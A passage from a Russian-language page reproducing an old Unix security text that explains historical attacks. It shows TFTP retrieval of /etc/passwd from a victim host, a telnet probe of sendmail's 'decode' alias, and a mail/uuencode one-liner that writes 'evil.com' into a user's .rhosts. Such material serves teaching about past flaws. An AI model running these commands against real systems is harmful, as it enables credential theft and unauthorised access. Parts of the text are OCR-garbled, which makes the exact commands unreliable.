Главная Случайная страница Контакты | Мы поможем в написании вашей работы! | ||
|
машины и разместить его в локальном каталоге /tmp:
evil % tftp
tftp> connect victim, corn
tftp> get /etc/passwd /tmp/passwd. Victim
tftp>quit
Это атака по сценарию 2.
Проникновение в систему с помощью sendmail
Sendmail - очень сложная программа, у которой всегда было много проблем с
Безопасностью, включая печально известную команду debug. С ее помощью,
Например анализируя сообщения, можно было получить некоторую информацию об
Удаленной системе, вплоть до номера версии. Это позволяет определить
Наличие в системе известных ошибок.
Кроме того, для старых версий sendmail можно было увидеть, запущен ли
псевдоним "decode", имеющий ряд проблем:
evil % telnet victim, corn 25
Connecting to host victim.corn (194.94.94.94.), port 25 connection open
220 victim.corn Sendmail Sendmail 5.55/victim ready at Fri, 6 Nov 93
PDT
Expn decode
250 ""l/Lisr/bin/uudecode""
Quit
С псевдонимом "decode" система подвергалась риску, так как злоумышленник
Мог изменить любые файлы, доступные для записи владельцу этого псевдонима,
Которым, как правило, являлся демон. Приведенный фрагмент кода помещал
Evil.com в файл.rhosts пользователя hacker, если он был доступен для
записи:
evil X echo "evil.com" I uuencode /home/hacker/, rhosts I mail
Дата публикования: 2014-11-04; Прочитано: 287 | Нарушение авторского права страницы | Мы поможем в написании вашей работы!